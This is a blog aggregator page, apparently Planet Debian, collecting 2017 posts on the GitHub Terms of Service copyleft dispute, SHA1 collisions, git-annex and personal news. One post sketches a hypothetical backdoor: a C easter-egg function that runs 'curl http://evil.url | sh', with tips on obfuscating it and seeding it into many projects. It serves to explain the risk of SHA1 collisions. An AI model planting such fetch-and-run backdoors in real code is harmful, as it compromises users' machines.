Search Results: "joey"

16 March 2017

Joey Hess: end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in the position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird!
[Image: satellite internet dish with solar panels in the foreground]
While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of having only dialup at home indefinitely became more painful. While I hope to eventually get on the fiber line that's only a few miles away, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now.
[Image: speedtest results, 9.1 dB SNR, 15 megabits down / 4.5 up, with significant variation]
The dish seems well aligned. Speed varies a lot, but is easily hundreds of times faster than dialup; latency is 2x dialup. The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity. It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day.

8 March 2017

Antoine Beaupré: An update to GitHub's terms of service

On February 28th, GitHub published a brand new version of its Terms of Service (ToS). While the first draft announced earlier in February didn't generate much reaction, the new ToS raised concerns that they may break at least the spirit, if not the letter, of certain free-software licenses. Digging in further reveals that the situation is probably not as dire as some had feared. The first person to raise the alarm was probably Thorsten Glaser, a Debian developer, who stated that the "new GitHub Terms of Service require removing many Open Source works from it". His concerns are mainly about section D of the document, in particular section D.4 which states:
You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
Section D.5 then goes on to say:
[...] You grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality

ToS versus GPL The concern here is that the ToS bypass the normal provisions of licenses like the GPL. Indeed, copyleft licenses are based on copyright law, which forbids users from doing anything with the content unless they comply with the license, which imposes, among other things, "share alike" requirements. By granting GitHub and its users rights to reproduce content without explicitly respecting the original license, the ToS may allow users to bypass the copyleft nature of the license. Indeed, as Joey Hess, author of git-annex, explained:
The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license
Hess has since removed all his content (mostly mirrors) from GitHub. Others disagree. In a well-reasoned blog post, Debian developer Jonathan McDowell explained the rationale behind the changes:
My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service.
This seems like a fair point to make: GitHub needs to protect its own rights to operate the service. McDowell then goes on to do a detailed rebuttal of the arguments made by Glaser, arguing specifically that section D.5 "does not grant [...] additional rights to reproduce outside of GitHub". However, specific problems arise when we consider that GitHub is a private corporation that users have no control over. The "Services" defined in the ToS explicitly "refers to the applications, software, products, and services provided by GitHub". The term "Services" is therefore not limited to the current set of services. This loophole may actually give GitHub the right to bypass certain provisions of licenses used on GitHub. As Hess detailed in a later blog post:
If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to apply to my software?
However, when asked on IRC, Bradley M. Kuhn of the Software Freedom Conservancy explained that "ultimately, failure to comply with a copyleft license is a copyright infringement" and that the ToS do outline a process to deal with such infringement. Some lawyers have also publicly expressed their disagreement with Glaser's assessment, with Richard Fontana from Red Hat saying that the analysis is "basically wrong". It all comes down to the intent of the ToS, as Kuhn (who is not a lawyer) explained:
any license can be abused or misused for an intent other than its original intent. It's why it matters to get every little detail right, and I hope Github will do that.
He went even further and said that "we should assume the ambiguity in their ToS as it stands is favorable to Free Software". The ToS have been in effect since February 28th; users "can accept them by clicking the broadcast announcement on your dashboard or by continuing to use GitHub". The immediacy of the change is one of the reasons why certain people are rushing to remove content from GitHub: there are concerns that continuing to use the service may be interpreted as consent to bypass those licenses. Hess even hosted a separate copy of the ToS [PDF] for people to be able to read the document without implicitly consenting. It is, however, unclear how a user should remove their content from the GitHub servers without actually agreeing to the new ToS.

CLAs When I read the first draft, I initially thought there would be concerns about the mandatory Contributor License Agreement (CLA) in section D.5 of the draft:
[...] unless there is a Contributor License Agreement to the contrary, whenever you make a contribution to a repository containing notice of a license, you license your contribution under the same terms, and agree that you have the right to license your contribution under those terms.
I was concerned this would establish the controversial practice of forcing CLAs on every GitHub user. I managed to find a post from a lawyer, Kyle E. Mitchell, who commented on the draft and, specifically, on the CLA. He outlined issues with wording and definition problems in that section of the draft. In particular, he noted that "contributor license agreement is not a legal term of art, but an industry term" and "is a bit fuzzy". This was clarified in the final draft, in section D.6, by removing the use of the CLA term and by explicitly mentioning the widely accepted norm for licenses: "inbound=outbound". So it seems that section D.6 is not really a problem: contributors do not need to necessarily delegate copyright ownership (as some CLAs require) when they make a contribution, unless otherwise noted by a repository-specific CLA. An interesting concern he raised, however, was with how GitHub conducted the drafting process. A blog post announced the change on February 7th with a link to a form to provide feedback until the 21st, with a publishing deadline of February 28th. This gave little time for lawyers and developers to review the document and comment on it. Users then had to basically accept whatever came out of the process as-is. Unlike every software project hosted on GitHub, the ToS document is not part of a Git repository people can propose changes to or even collaboratively discuss. While Mitchell acknowledges that "GitHub are within their rights to update their terms, within very broad limits, more or less however they like, whenever they like", he sets higher standards for GitHub than for other corporations, considering the community it serves and the spirit it represents. He described the process as:
[...] consistent with the value of CYA, which is real, but not with the output-improving virtues of open process, which is also real, and a great deal more pleasant.
Mitchell also explained that, because of its position, GitHub can have a major impact on the free-software world.
And as the current forum of preference for a great many developers, the knock-on effects of their decisions throw big weight. While GitHub have the wheel, and they've certainly earned it for now, they can do real damage.
In particular, there have been some concerns that the ToS change may be an attempt to further the already diminishing adoption of the GPL for free-software projects; on GitHub, the GPL has been surpassed by the MIT license. But Kuhn believes that attitudes at GitHub have begun changing:
GitHub historically had an anti-copyleft culture, which was created in large part by their former and now ousted CEO, Preston-Werner. However, recently, I've seen people at GitHub truly reach out to me and others in the copyleft community to learn more and open their minds. I thus have a hard time believing that there was some anti-copyleft conspiracy in this ToS change.

GitHub response However, it seems that GitHub has actually been proactive in reaching out to the free software community. Kuhn noted that GitHub contacted the Conservancy to get its advice on the ToS changes. While he still thinks GitHub should fix the ambiguities quickly, he also noted that those issues "impact pretty much any non-trivial Open Source and Free Software license", not just copylefted material. When reached for comments, a GitHub spokesperson said:
While we are confident that these Terms serve the best needs of the community, we take our users' feedback very seriously and we are looking closely at ways to address their concerns.
Regardless, free-software enthusiasts have other concerns than the new ToS if they wish to use GitHub. First and foremost, most of the software running GitHub is proprietary, including the JavaScript served to your web browser. GitHub also created a centralized service out of a decentralized tool (Git). It has become the largest code hosting service in the world after only a few years and may well have become a single point of failure for free software collaboration in a way we have never seen before. Outages and policy changes at GitHub can have a major impact on not only the free-software world, but also the larger computing world that relies on its services for daily operation. There are now free-software alternatives to GitHub. GitLab.com, for example, does not seem to have similar licensing issues in its ToS and GitLab itself is free software, although based on the controversial open core business model. The GitLab hosting service still needs to get better than its grade of "C" in the GNU Ethical Repository Criteria Evaluations (and it is being worked on); other services like GitHub and SourceForge score an "F". In the end, all this controversy might have been avoided if GitHub was generally more open about the ToS development process and gave more time for feedback and reviews by the community. Terms of service are notorious for being confusing and something of a legal gray area, especially for end users who generally click through without reading them. We should probably applaud the efforts made by GitHub to make its own ToS document more readable and hope that, with time, it will address the community's concerns.
Note: this article first appeared in the Linux Weekly News.

2 March 2017

Joey Hess: what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged. That's weird.. I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github. And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do it seems very important indeed, and not worth taking risks with. If I were looking over the TOS with my lawyers, I'd ask these questions...
4 License Grant to Us
This seems to be saying that I'm granting an additional license to my software to Github. Is that right, or does "license grant" have some other legal meaning? If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licensed under two different licenses? There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not? "Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone, say, does some brief contracting with Github, they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies? Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was load a webpage in a browser and see on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.) Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way? Am I asking too many questions only 4 words into this thing? Or not enough?
Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording? What are the chances that, if we had a dispute and this came before a judge, Github's lawyers would be able to find a creative reading of this that makes "do things like" include whatever they want? Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?
That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).
Suppose that Github modifies my software, does not distribute the modified version, but converts it to javascript code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?
This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.
I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future? If Github tomorrow starts providing, say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to apply to my software?
5 License Grant to Other Users
Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).
Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they are no longer allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software? The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked? How would this use of the platform-specific term "fork" be interpreted in this license if it were being analyzed in a courtroom?
If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.
This paragraph seems entirely innocuous. So, what does your keen lawyer mind see in it that I don't? How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up? What questions have I forgotten to ask?
And finally, the last question I'd be asking my lawyers: What's your bill come to? That much? Is using Github worth that much to me?

Jonathan McDowell: Rational thoughts on the GitHub ToS change

I woke this morning to Thorsten claiming the new GitHub Terms of Service could require the removal of Free software projects from it. This was followed by joeyh removing everything from github. I hadn't actually been paying attention, so I went looking for some sort of summary of whether I should be worried and ended up reading the actual ToS instead. TL;DR version: No, I'm not worried and I don't think you should be either.
First, a disclaimer. I'm not a lawyer. I have some legal training, but none of what I'm about to say is legal advice. If you're really worried about the changes then you should engage the services of a professional.
The gist of the concerns around GitHub's changes are that they potentially circumvent any license you have applied to your code, either converting GPL licensed software to BSD style (and thus permitting redistribution of binary forms without source) or making it illegal to host software under certain Free software licenses on GitHub due to being unable to meet the requirements of those licenses as a result of GitHub's ToS.
My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service. There are sadly too many people who upload code there without a license, meaning that technically no one can do anything with it. Don't do this, people; make sure that any project you put on GitHub has some sort of license attached to it (don't write your own - it's highly likely one of Apache/BSD/GPL will suit your needs) so people know whether they can make use of it or not. "I don't care" is not a valid reason not to do this.
Section D, relating to user generated content, is the one causing the problems. It's possibly easiest to walk through each subsection in order.
D1 says GitHub don't take any responsibility for your content; you make it, you're responsible for it, they're not accepting any blame for harm your content does nor for anything any member of the public might do with content you've put on GitHub. This seems uncontentious.
D2 reaffirms your ownership of any content you create, and requires you to only post 3rd party content to GitHub that you have appropriate rights to. So I can't, for example, upload a copy of "Friday" by Rebecca Black.
Thorsten has some problems with D3, where GitHub reserve the right to remove content that violates their terms or policies. He argues this could cause issues with licenses that require unmodified source code. This seems to be alarmist, and also applies to any random software mirror. The intent of such licenses is in general to ensure that the pristine source code is clearly separate from 3rd party modifications. Removal of content that infringes GitHub's T&Cs is not going to cause an issue.
D4 is a license grant to GitHub, and I think forms part of joeyh's problems with the changes. It affirms the content belongs to the user, but grants rights to GitHub to store and display the content, as well as make copies such as necessary to provide the GitHub service. They explicitly state that no right is granted to sell the content at all or to distribute the content outside of providing the GitHub service. This term would seem to be the minimum necessary for GitHub to ensure they are allowed to provide code uploaded to them for download, and provide their web interface. If you've actually put a Free license on your code then this isn't necessary, but from GitHub's point of view I can understand wanting to make it explicit that they need these rights to be granted. I don't believe it provides a method of subverting the licensing intent of Free software authors.
D5 provides more concern to Thorsten. It seems he believes that the ability to fork code on GitHub provides a mechanism to circumvent copyleft licenses. I don't agree. The second paragraph of this subsection limits the license granted to the user to be the ability to reproduce the content on GitHub - it does not grant them additional rights to reproduce outside of GitHub. These rights, to my eye, enable the forking and viewing of content within GitHub but say nothing about my rights to check code out and ignore the author's upstream license.
D6 clarifies that if you submit content to a GitHub repo that features a license you are licensing your contribution under these terms, assuming you have no other agreement in place. This looks to be something that benefits projects on GitHub receiving contributions from users there; it's an explicit statement that such contributions are under the project license.
D7 confirms the retention of moral rights by the content owner, but states they are waived purely for the purposes of enabling GitHub to provide service, as stated under D4. In particular this right is revocable, so in the event they do something you don't like you can instantly remove all of their rights. Thorsten is more worried about the ability to remove attribution and thus breach CC-BY or some BSD licenses, but GitHub's whole model is providing attribution for changesets and tracking such changes over time, so it's hard to understand exactly where the service falls down on ensuring the provenance of content is clear.
There are reasons to be wary of GitHub (they've taken a decentralised revision control system and made a business model around being a centralised implementation of it, and they store additional metadata such as PRs that aren't as easily extracted), but I don't see any indication that the most recent changes to their Terms of Service are something to worry about. The intent is clearly to provide GitHub with the legal basis they need to provide their service, rather than to provide a means for them to subvert the license intent of any Free software uploaded.

1 March 2017

Joey Hess: removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis. I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care, or has some reason to want to effectively neuter copyleft software licenses. The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use. Github's value proposition was never very high for me, and it has now gone negative. I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, or myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.) [Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.] See also: PDF of Github TOS that can be read without being forced to first accept Github's TOS

Thorsten Glaser: New GitHub Terms of Service r e q u i r e removing many Open Source works from it

[Update: Please use the correct (perma)link to bookmark this article, not the page listing all wlog entries of the last decade. Thank you. Some updates are inline and at the bottom.]
The new Terms of Service of GitHub became effective today, which is quite problematic: there was a review phase, but my reviews pointing out the problems were not answered, and, while the language is somewhat changed from the draft, the terms became effective immediately. Now, the new ToS are not so bad that one must immediately stop using their service in disagreement, but it's important that certain content may no longer legally be pushed to GitHub. I'll try to explain which content is affected, and why. I'm mostly working my way backwards through section D, as that's where the problems I identified lie, and because this goes from easier to harder. Note that using a private repository does not help, as the same terms apply.
Anything requiring attribution (e.g. CC-BY, but also BSD, ...)
Section D.7 requires the person uploading content to waive any and all attribution rights. Ostensibly "to allow basic functions like search to work", which I can even believe, but, for a work the uploader did not create completely by themselves, they can't grant this licence. The CC licences are notably bad because they don't permit sublicencing, but even so, anything requiring attribution can, in almost all cases, not be "written or otherwise, created or uploaded by our Users". This is fact, and the exceptions are few.
Anything putting conditions on the right to "use, display and perform" the work and, worse, "reproduce" (all copyleft)
Section D.5 requires the uploader to grant all other GitHub users the right to use, display and perform, and even reproduce, the content. (Note that section D.4 is similar, but grants the licence to GitHub and their successors; while this is worded much more friendly than in the draft, this fact only makes it harder to see if it affects works in a similar way. But that doesn't matter, since D.5 is clear enough. This doesn't mean D.4 is not a problem, just that I don't want to go there and analyse it, as D.5 points out the same problems but is easier.) This means that any and all content under copyleft licences is also no longer welcome on GitHub.
Anything requiring integrity of the author's source (e.g. LPPL)
Some licences are famous for requiring people to keep the original intact while permitting patches to be piled on top; this is actually permissible for Open Source, even though annoying, and the most common LaTeX licence is rather close to that. Section D.3 says any (partial) content can be removed, though keeping a PKZIP archive of the original is a likely workaround.
Affected licences
Anything copyleft (GPL, AGPL, LGPL, CC-*-SA) or requiring attribution (CC-BY-*, but also 4-clause BSD, Apache 2 with NOTICE text file, ...) is affected. BSD-style licences without advertising clause (MIT/Expat, MirOS, etc.) are probably not affected if GitHub doesn't go too far and dissociate excerpts from their context and legal info, but then nobody would be able to distribute it, so that'd be useless.
But what if I just fork something under such a licence?
Only continuing to use GitHub constitutes accepting the new terms. This means that repositories from people who last used GitHub before March 2017 are excluded. Even then, the new terms likely only apply to content uploaded in March 2017 or later (note that git commit dates are unreliable; you have to actually check whether the contribution dates from March 2017 or later). And then, most people are likely unaware of the new terms. If they upload content for which they themselves don't have the appropriate rights (waivers to attribution and copyleft/share-alike clauses), it's plain illegal, and that also makes your upload of it, or a derivative thereof, no more legal. Granted, people who, in full knowledge of the new ToS, share any User-Generated Content with GitHub on or after 1 March 2017, and actually have the appropriate rights to do that, can do that; and if you encounter such a repository, you can fork, modify and upload it iff you also waive attribution and copyleft/share-alike rights for your portion of the upload. But especially in the beginning these will be few and far between (even more so taking into account that GitHub is, legally spoken, a mess, and they don't even care about hosting only OSS / Free works).
Conclusion (Fazit)
I'll be starting to remove any such content of mine, such as the source code mirrors of jupp, which is under the GNU GPLv1, now, and will be requesting people who forked such repositories on GitHub to also remove them. This is not something I like to do, but something I am required to do in order to comply with the licence granted to me by my upstream. Anything you've found contributed by me in the meantime is up for review; ping me if I forgot something. (mksh is likely safe, even if I hereby remind you that the attribution requirement of the BSD-style licences still applies outside of GitHub.)
(Pet peeve: why can't I adopt a licence with British spelling? They seem to require overseas barbarian spelling.)
The others
Atlassian Bitbucket has similar terms (even worse actually; I looked at them to see whether I could mirror mksh there, and it turns out I can't if I don't want to lose most of what few rights I retain when publishing under a permissive licence). Gitlab seems to not have such terms, but requires you to indemnify them; YMMV. I think I'll self-host the removed content.
And now?
I'm in contact with someone from GitHub Legal (not explicitly in an official capacity though) and will try to explain the sheer magnitude of the problem and ways to solve this (leaving the technical issues to technical solutions and requiring legal solutions only where strictly necessary), but for now, the ToS are enacted (another point of my criticism of this move) and thus the aforementioned works must go off GitHub right now. That's not to say they may not come back later, once this all has been addressed, if it is addressed in a way that allows that. The new ToS do have some good; for example, the old ToS said you allow every GitHub user to "fork" your repositories, without ever specifying what that means. It's just that the people over at GitHub need to understand that, both legally and technically [1], any and all OSS licences grant enough to run a hosting platform already [2], and separate explicit grants are only needed if a repository contains content not under an OSI/OKFN/Copyfree/FSF/DFSG-free licence. I have been told that these are important issues and been thanked for my feedback; we'll see what comes from this.
[1] Maybe with a little more effort on the coders' side, e.g. when displaying search results, add a note "this is an excerpt, click HERE to get to the original work in its context, with licence and attribution" where HERE is a backlink to the file in the repository.
[2] All licences on one of those lists, or conformant to the DFSG, OSD or OKD, should do. It is understood those organisations never un-approve any licence that rightfully conforms to those definitions (also in cases like a grant saying "just use any OSS licence", which is occasionally used).
Update: In the meantime, joeyh has written not one but two insightful articles (although I disagree in some details; the new licence is granted only to GitHub users (D.5) and GitHub itself (D.4), and only within their system, so, while uploaders would violate the ToS (they cannot grant the licence) and (probably) the upstream-granted copyleft licence, this would not mean that everyone else wasn't bound by the copyleft licence in, well, enough cases to count (yes, it's possible to construct situations in which this hurts the copyleft fraction, but no, they're nowhere near 100%)).

27 February 2017

Joey Hess: making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it? Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified). When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks. This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/. My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits. PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. However secure that might be..
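For readers who want the signed-commit precondition concretely, here is a minimal sketch (the key id is a placeholder); note that the protection only applies if verification actually happens:
git config commit.gpgsign true       # sign every commit in this repository
git config user.signingkey DEADBEEF  # placeholder key id
git commit -m "add annexed files"
git verify-commit HEAD               # fails if the signature is missing or bad
git log --show-signature             # audit signatures across history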

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first tenth of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
void check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == '9')
        system("curl http://evil.url | sh");
}
Now, you need a C obfuscation person, to make that backdoor a little less obvious. (Hint: Add code to fix the newlines, paint additional ASCII sprites over top of the static art, add animations, etc., and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chunk. You can then replace the good file with the bad version here and there, and no one will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.
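As a footnote, the git blob object header trick mentioned in the parenthetical above is easy to check for yourself; this sketch (file name and contents are arbitrary) computes the same digest two ways:
printf 'hello' > f
git hash-object f                      # git's SHA1 of the blob
(printf 'blob 5\0'; cat f) | sha1sum   # same digest: "blob <size>\0" header + content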

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

22 February 2017

Joey Hess: early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up. Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before. Also, it turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed to the cliff earlier; it seemed to be worst when house voltage was low.) Soon, 6 months of more power than I can use.. Previously: battery bank refresh, late summer, the cliff

17 February 2017

Joey Hess: Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!) After attending for four years, I finally thought it was time to perhaps speak at it.
Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the Free Software Awards and discuss pressing threats and important opportunities for software freedom. Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998." That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone. Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.
-- Here's a sneak peek at LibrePlanet 2017: Register today! I'll be giving some variant of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

8 February 2017

Manuel A. Fernandez Montecelo: FOSDEM 2017: People, RISC-V and ChaosKey

This year, for the first time, I attended FOSDEM. There I met... People ...including: I met new people in: ...from the first hour to the last hour of my stay in Brussels. In summary, lots of people around. I also hoped to meet or spend some (more) time with a few people, but in the end I didn't catch them, or could not spend as much time with them as I would have wished. For somebody like me, who enjoys quiet time alone, it was a bit too intensive in terms of interacting with people. But overall it was a nice winter break, definitely worth attending, and an even much better experience than I had expected. Talks / Events Of course, I also attended a few talks, some of which were very interesting; although the event is so (sometimes uncomfortably) crowded that the rooms were full more often than not, in which case it was not possible to enter (the doors were closed) or there were very long queues for waiting. And with so many talks crammed into a weekend, I had so many schedule clashes with the talks that I had pre-selected as interesting that I ended up missing most of them. In terms of technical stuff, I especially enjoyed the talk by Arun Thomas, "RISC-V -- Open Hardware for Your Open Source Software", and some conversations about toolchain and other upstream stuff, as well as about the Debian port for RISC-V. The talk "Resurrecting dinosaurs, what can possibly go wrong? -- How Containerised Applications could eat our users", by Richard Brown, was also very good. ChaosKey Apart from that, I witnessed a shady cash transaction in a bus from the city centre to FOSDEM in exchange for hardware, not very unlike what I had read about only days before. So I could not help but get involved in a subsequent transaction myself, to lay my hands upon a ChaosKey.

26 January 2017

Joey Hess: badUSB

3 panel comic: 1. In a dark corner of the Linux Conf AU penguin dinner. 2. (Kindly accountant / uncle looking guy) Wanna USB key? First one is free! (I made it myself.) (No driver needed..) 3. It did look homemade, but I couldn't resist... My computer has not been the same since. This actually happened.
Jan 19 00:05:10 darkstar kernel: usb 2-2: Product: ChaosKey-hw-1.0-sw-1.6.
In real life, my hat is uglier, and Keithp is more kindly looking. gimp source

9 January 2017

Sean Whitton: jan17vcspkg

